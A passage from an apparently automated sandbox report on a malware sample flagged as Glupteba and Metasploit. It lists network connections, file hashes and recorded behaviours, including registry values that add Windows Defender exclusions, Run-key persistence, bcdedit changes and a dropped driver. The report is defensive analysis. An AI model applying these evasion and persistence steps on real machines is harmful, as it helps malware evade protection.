| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp |
Files
memory/3348-0-0x0000000074CDE000-0x0000000074CDF000-memory.dmp
memory/3348-1-0x0000000000990000-0x00000000009FC000-memory.dmp
memory/3348-2-0x0000000005A10000-0x0000000005FB4000-memory.dmp
memory/3348-3-0x0000000005460000-0x00000000054F2000-memory.dmp
memory/3348-5-0x0000000074CD0000-0x0000000075480000-memory.dmp
memory/3348-4-0x00000000053D0000-0x00000000053DA000-memory.dmp
memory/3348-6-0x00000000081A0000-0x000000000823C000-memory.dmp
memory/3348-7-0x00000000056C0000-0x00000000056C8000-memory.dmp
memory/3348-8-0x0000000074CDE000-0x0000000074CDF000-memory.dmp
memory/3348-9-0x0000000074CD0000-0x0000000075480000-memory.dmp
memory/3348-10-0x0000000006730000-0x00000000067A8000-memory.dmp
memory/3348-11-0x0000000006920000-0x000000000694A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp2565.tmp
| MD5 | 41678239f4787588d5b05c842019016e |
| SHA1 | 24c6f5a5aa016fc44891cc2fe529e868a7e73627 |
| SHA256 | c0b9f119fd62e8b47be6a0aae42f9e3ee327b0d9ef189450f112c30618586b1e |
| SHA512 | 310c855bb39cb9d7601746c2beef9fdfbf4e367fadf28876c3a139667031708b729f18c009a4e31ed83fd242c54e87935eef7efb500be5cc04443976cf1e5a0f |
memory/2296-15-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
memory/2296-18-0x0000000074CD0000-0x0000000075480000-memory.dmp
memory/2296-20-0x00000000053B0000-0x00000000053C2000-memory.dmp
memory/2296-19-0x0000000005960000-0x0000000005F78000-memory.dmp
memory/2296-21-0x0000000005450000-0x000000000548C000-memory.dmp
memory/3348-22-0x0000000074CD0000-0x0000000075480000-memory.dmp
memory/2296-23-0x0000000074CD0000-0x0000000075480000-memory.dmp
memory/2296-24-0x0000000005490000-0x00000000054DC000-memory.dmp
memory/2296-25-0x0000000005700000-0x000000000580A000-memory.dmp
memory/2296-26-0x0000000074CD0000-0x0000000075480000-memory.dmp
memory/2296-27-0x0000000074CD0000-0x0000000075480000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20240903-en
Max time kernel
149s
Max time network
145s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\SnowyRain = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\SnowyRain = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\SnowyRain = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241108021129.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
